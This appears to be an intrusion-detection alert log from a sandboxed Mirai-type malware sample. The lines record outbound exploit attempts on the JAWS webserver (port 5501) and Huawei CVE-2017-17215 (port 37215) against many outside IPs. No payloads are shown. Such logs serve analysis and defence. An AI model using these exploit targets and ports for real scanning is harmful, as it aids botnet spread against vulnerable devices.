                                              2024-12-13T01:15:23.811050+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338396222.237.34.1415501TCP
                                              2024-12-13T01:15:23.811050+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338396222.237.34.1415501TCP
                                              2024-12-13T01:15:23.851966+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339924185.63.143.2555501TCP
                                              2024-12-13T01:15:23.851966+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339924185.63.143.2555501TCP
                                              2024-12-13T01:15:23.866808+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335860163.130.31.1685501TCP
                                              2024-12-13T01:15:23.866808+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335860163.130.31.1685501TCP
                                              2024-12-13T01:15:23.866925+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233358819.100.194.815501TCP
                                              2024-12-13T01:15:23.866925+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233358819.100.194.815501TCP
                                              2024-12-13T01:15:24.264673+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336730186.27.222.337215TCP
                                              2024-12-13T01:15:24.882321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344740211.83.192.825501TCP
                                              2024-12-13T01:15:24.882321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344740211.83.192.825501TCP
                                              2024-12-13T01:15:25.007398+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342582125.62.223.775501TCP
                                              2024-12-13T01:15:25.007398+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342582125.62.223.775501TCP
                                              2024-12-13T01:15:25.851642+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344568160.82.14.24337215TCP
                                              2024-12-13T01:15:25.945049+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339294157.176.218.23637215TCP
                                              2024-12-13T01:15:26.195202+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351352157.246.27.15337215TCP
                                              2024-12-13T01:15:26.898156+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335856102.43.129.2555501TCP
                                              2024-12-13T01:15:26.898156+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335856102.43.129.2555501TCP
                                              2024-12-13T01:15:27.069686+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345214181.121.26.23337215TCP
                                              2024-12-13T01:15:29.117120+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347426181.255.157.15837215TCP
                                              2024-12-13T01:15:29.227084+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356724181.60.76.9237215TCP
                                              2024-12-13T01:15:29.257528+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346498181.239.155.21137215TCP
                                              2024-12-13T01:15:29.304603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351958181.50.91.12437215TCP
                                              2024-12-13T01:15:30.054543+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342840181.148.237.12537215TCP
                                              2024-12-13T01:15:30.272957+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343592102.172.214.2737215TCP
                                              2024-12-13T01:15:30.273135+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336420102.127.47.12837215TCP
                                              2024-12-13T01:15:30.741813+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234922260.246.206.2215501TCP
                                              2024-12-13T01:15:30.741813+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234922260.246.206.2215501TCP
                                              2024-12-13T01:15:32.180147+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350820181.223.179.15137215TCP
                                              2024-12-13T01:15:32.304533+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233501841.56.143.8037215TCP
                                              2024-12-13T01:15:32.304718+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234653241.30.172.5037215TCP
                                              2024-12-13T01:15:32.429542+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347912157.113.236.12037215TCP
                                              2024-12-13T01:15:33.317840+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357308102.30.77.2737215TCP
                                              2024-12-13T01:15:33.320074+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235649041.10.66.9937215TCP
                                              2024-12-13T01:15:33.320074+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233338241.138.250.22837215TCP
                                              2024-12-13T01:15:33.335504+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233785641.170.191.24737215TCP
                                              2024-12-13T01:15:33.476480+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358196190.212.125.19437215TCP
                                              2024-12-13T01:15:34.601511+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340082118.248.116.1115501TCP
                                              2024-12-13T01:15:34.601511+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340082118.248.116.1115501TCP
                                              2024-12-13T01:15:34.851501+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357622181.67.235.15737215TCP
                                              2024-12-13T01:15:34.867762+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338178181.151.219.16937215TCP
                                              2024-12-13T01:15:35.351462+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334470223.212.221.1005501TCP
                                              2024-12-13T01:15:35.351462+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334470223.212.221.1005501TCP
                                              2024-12-13T01:15:35.398644+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233698641.134.217.4937215TCP
                                              2024-12-13T01:15:35.476479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234886452.21.187.165501TCP
                                              2024-12-13T01:15:35.476479+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234886452.21.187.165501TCP
                                              2024-12-13T01:15:35.492064+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334658157.56.225.12637215TCP
                                              2024-12-13T01:15:35.875701+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353090181.226.101.13537215TCP
                                              2024-12-13T01:15:37.647350+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357770181.69.25.24537215TCP
                                              2024-12-13T01:15:37.647786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234811047.49.104.1605501TCP
                                              2024-12-13T01:15:37.647786+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234811047.49.104.1605501TCP
                                              2024-12-13T01:15:37.742263+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356510160.144.173.2315501TCP
                                              2024-12-13T01:15:37.742263+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356510160.144.173.2315501TCP
                                              2024-12-13T01:15:37.773490+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336214190.93.96.275501TCP
                                              2024-12-13T01:15:37.773490+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336214190.93.96.275501TCP
                                              2024-12-13T01:15:37.882772+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23506508.126.1.645501TCP
                                              2024-12-13T01:15:37.882772+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23506508.126.1.645501TCP
                                              2024-12-13T01:15:37.898590+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351668118.115.52.2545501TCP
                                              2024-12-13T01:15:37.898590+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351668118.115.52.2545501TCP
                                              2024-12-13T01:15:38.742044+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354248139.156.242.155501TCP
                                              2024-12-13T01:15:38.742044+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354248139.156.242.155501TCP
                                              2024-12-13T01:15:39.008843+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356036157.201.2.5137215TCP
                                              2024-12-13T01:15:39.023271+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344062157.197.129.1437215TCP
                                              2024-12-13T01:15:40.024584+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355990157.135.224.6937215TCP
                                              2024-12-13T01:15:40.054466+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334814157.252.248.13937215TCP
                                              2024-12-13T01:15:40.804684+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335784223.231.147.25501TCP
                                              2024-12-13T01:15:40.804684+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335784223.231.147.25501TCP
                                              2024-12-13T01:15:40.929402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337694132.134.188.2175501TCP
                                              2024-12-13T01:15:40.929402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337694132.134.188.2175501TCP
                                              2024-12-13T01:15:40.929514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235702269.210.252.2475501TCP
                                              2024-12-13T01:15:40.929514+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235702269.210.252.2475501TCP
                                              2024-12-13T01:15:42.929788+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335568186.148.221.5637215TCP
                                              2024-12-13T01:15:42.961361+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351012186.186.193.8337215TCP
                                              2024-12-13T01:15:42.992372+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358420186.107.86.7737215TCP
                                              2024-12-13T01:15:43.055058+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340284105.9.23.4237215TCP
                                              2024-12-13T01:15:43.304536+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352452105.41.195.10037215TCP
                                              2024-12-13T01:15:43.351559+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354252222.173.226.425501TCP
                                              2024-12-13T01:15:43.351559+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354252222.173.226.425501TCP
                                              2024-12-13T01:15:43.976581+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342556186.86.153.8637215TCP
                                              2024-12-13T01:15:43.992529+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360368186.254.225.9937215TCP
                                              2024-12-13T01:15:44.055157+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360616186.11.100.25237215TCP
                                              2024-12-13T01:15:44.273929+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348876160.171.161.8437215TCP
                                              2024-12-13T01:15:44.274048+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350588160.192.152.237215TCP
                                              2024-12-13T01:15:45.508244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347238193.113.167.1095501TCP
                                              2024-12-13T01:15:45.508244+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347238193.113.167.1095501TCP
                                              2024-12-13T01:15:45.555324+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345194160.35.220.7837215TCP
                                              2024-12-13T01:15:45.773377+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357444160.48.44.11137215TCP
                                              2024-12-13T01:15:45.993839+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339412186.70.220.16237215TCP
                                              2024-12-13T01:15:46.024022+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342280186.52.12.1837215TCP
                                              2024-12-13T01:15:46.024253+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360700186.185.238.12037215TCP
                                              2024-12-13T01:15:46.024253+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354316186.227.74.20837215TCP
                                              2024-12-13T01:15:46.024253+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349630186.62.130.4037215TCP
                                              2024-12-13T01:15:46.024254+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346672186.125.195.22537215TCP
                                              2024-12-13T01:15:46.024255+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344452186.37.189.17837215TCP
                                              2024-12-13T01:15:46.055260+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350002186.60.14.15037215TCP
                                              2024-12-13T01:15:46.055260+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333950186.172.81.18737215TCP
                                              2024-12-13T01:15:46.055436+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355860186.231.78.4137215TCP
                                              2024-12-13T01:15:46.070858+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341138105.144.101.7637215TCP
                                              2024-12-13T01:15:46.101459+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355690105.87.180.10037215TCP
                                              2024-12-13T01:15:46.383061+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234816847.127.216.2545501TCP
                                              2024-12-13T01:15:46.383061+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234816847.127.216.2545501TCP
                                              2024-12-13T01:15:46.398971+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335658148.193.197.825501TCP
                                              2024-12-13T01:15:46.398971+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335658148.193.197.825501TCP
                                              2024-12-13T01:15:46.507559+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337934162.25.104.505501TCP
                                              2024-12-13T01:15:46.507559+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337934162.25.104.505501TCP
                                              2024-12-13T01:15:46.555280+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339648160.143.176.10537215TCP
                                              2024-12-13T01:15:46.602037+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2332856160.194.123.837215TCP
                                              2024-12-13T01:15:46.805309+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337938105.211.207.6437215TCP
                                              2024-12-13T01:15:47.660899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234574460.138.12.335501TCP
                                              2024-12-13T01:15:47.660899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234574460.138.12.335501TCP
                                              2024-12-13T01:15:47.805529+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341476144.151.41.895501TCP
                                              2024-12-13T01:15:47.805529+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341476144.151.41.895501TCP
                                              2024-12-13T01:15:47.805602+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23527689.160.33.115501TCP
                                              2024-12-13T01:15:47.805602+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23527689.160.33.115501TCP
                                              2024-12-13T01:15:47.820395+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235621646.5.8.1085501TCP
                                              2024-12-13T01:15:47.820395+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235621646.5.8.1085501TCP
                                              2024-12-13T01:15:48.183309+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358066160.167.175.21237215TCP
                                              2024-12-13T01:15:48.554929+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235621620.180.248.2325501TCP
                                              2024-12-13T01:15:48.554929+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235621620.180.248.2325501TCP
                                              2024-12-13T01:15:48.555054+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359496152.139.122.1795501TCP
                                              2024-12-13T01:15:48.555054+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359496152.139.122.1795501TCP
                                              2024-12-13T01:15:48.571041+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342014160.107.10.23937215TCP
                                              2024-12-13T01:15:48.664287+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233885095.114.186.2215501TCP
                                              2024-12-13T01:15:48.664287+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233885095.114.186.2215501TCP
                                              2024-12-13T01:15:48.805461+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235045860.180.199.1585501TCP
                                              2024-12-13T01:15:48.805461+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235045860.180.199.1585501TCP
                                              2024-12-13T01:15:48.898266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340714130.6.144.1985501TCP
                                              2024-12-13T01:15:48.898266+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340714130.6.144.1985501TCP
                                              2024-12-13T01:15:48.914050+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344554218.33.94.125501TCP
                                              2024-12-13T01:15:48.914050+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344554218.33.94.125501TCP
                                              2024-12-13T01:15:49.288687+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360232160.89.140.8237215TCP
                                              2024-12-13T01:15:49.930228+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234566413.255.28.1595501TCP
                                              2024-12-13T01:15:49.930228+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234566413.255.28.1595501TCP
                                              2024-12-13T01:15:50.853127+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351136195.61.91.2165501TCP
                                              2024-12-13T01:15:50.853127+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351136195.61.91.2165501TCP
                                              2024-12-13T01:15:51.055331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341186136.225.110.675501TCP
                                              2024-12-13T01:15:51.055331+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341186136.225.110.675501TCP
                                              2024-12-13T01:15:51.851795+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339724102.139.45.18437215TCP
                                              2024-12-13T01:15:51.867276+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349722102.95.31.22337215TCP
                                              2024-12-13T01:15:51.961075+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337184157.37.253.12037215TCP
                                              2024-12-13T01:15:51.976544+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346472208.81.246.2445501TCP
                                              2024-12-13T01:15:51.976544+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346472208.81.246.2445501TCP
                                              2024-12-13T01:15:52.103058+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341202135.194.239.2535501TCP
                                              2024-12-13T01:15:52.103058+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341202135.194.239.2535501TCP
                                              2024-12-13T01:15:52.103108+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233290083.244.161.195501TCP
                                              2024-12-13T01:15:52.103108+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233290083.244.161.195501TCP
                                              2024-12-13T01:15:52.227515+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335296170.90.85.2255501TCP
                                              2024-12-13T01:15:52.227515+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335296170.90.85.2255501TCP
                                              2024-12-13T01:15:52.227517+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346484102.141.178.2385501TCP
                                              2024-12-13T01:15:52.227517+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346484102.141.178.2385501TCP
                                              2024-12-13T01:15:52.242817+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235896467.231.184.1855501TCP
                                              2024-12-13T01:15:52.242817+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235896467.231.184.1855501TCP
                                              2024-12-13T01:15:52.852367+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354796102.197.142.6537215TCP
                                              2024-12-13T01:15:53.054894+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234540883.228.93.985501TCP
                                              2024-12-13T01:15:53.054894+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234540883.228.93.985501TCP
                                              2024-12-13T01:15:53.085893+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357574117.29.174.935501TCP
                                              2024-12-13T01:15:53.085893+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357574117.29.174.935501TCP
                                              2024-12-13T01:15:53.086113+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235963882.160.166.1705501TCP
                                              2024-12-13T01:15:53.086113+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235963882.160.166.1705501TCP
                                              2024-12-13T01:15:53.352159+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235290488.210.208.2075501TCP
                                              2024-12-13T01:15:53.352159+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235290488.210.208.2075501TCP
                                              2024-12-13T01:15:54.102085+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234879441.193.34.13737215TCP
                                              2024-12-13T01:15:54.134099+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235225641.252.235.23437215TCP
                                              2024-12-13T01:15:54.134253+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358782183.129.202.1825501TCP
                                              2024-12-13T01:15:54.134253+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358782183.129.202.1825501TCP
                                              2024-12-13T01:15:54.351746+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350198102.251.63.2037215TCP
                                              2024-12-13T01:15:54.382893+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233843441.10.210.5037215TCP
                                              2024-12-13T01:15:54.992340+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233398241.59.235.20037215TCP
                                              2024-12-13T01:15:55.226545+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339502102.85.177.19937215TCP
                                              2024-12-13T01:15:56.117642+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353206181.152.6.10237215TCP
                                              2024-12-13T01:15:56.137618+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359522181.197.26.11637215TCP
                                              2024-12-13T01:15:56.602266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235342048.148.149.775501TCP
                                              2024-12-13T01:15:56.602266+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235342048.148.149.775501TCP
                                              2024-12-13T01:15:56.602384+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234470247.39.45.2195501TCP
                                              2024-12-13T01:15:56.602384+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234470247.39.45.2195501TCP
                                              2024-12-13T01:15:56.710954+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353290181.14.18.9437215TCP
                                              2024-12-13T01:15:57.023745+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234270441.196.32.23537215TCP
                                              2024-12-13T01:15:57.117993+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346054156.72.54.11837215TCP
                                              2024-12-13T01:15:57.414542+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335460168.172.153.1775501TCP
                                              2024-12-13T01:15:57.414542+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335460168.172.153.1775501TCP
                                              2024-12-13T01:15:57.555447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343058101.47.114.2475501TCP
                                              2024-12-13T01:15:57.555447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343058101.47.114.2475501TCP
                                              2024-12-13T01:15:57.854509+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23520921.249.5.2255501TCP
                                              2024-12-13T01:15:57.854509+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23520921.249.5.2255501TCP
                                              2024-12-13T01:15:57.867471+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235920227.9.151.2415501TCP
                                              2024-12-13T01:15:57.867471+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235920227.9.151.2415501TCP
                                              2024-12-13T01:15:58.383112+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235251825.216.246.2495501TCP
                                              2024-12-13T01:15:58.383112+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235251825.216.246.2495501TCP
                                              2024-12-13T01:15:58.383214+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234007298.7.217.2055501TCP
                                              2024-12-13T01:15:58.383214+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234007298.7.217.2055501TCP
                                              2024-12-13T01:15:58.398575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334866161.42.197.2235501TCP
                                              2024-12-13T01:15:58.398575+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334866161.42.197.2235501TCP
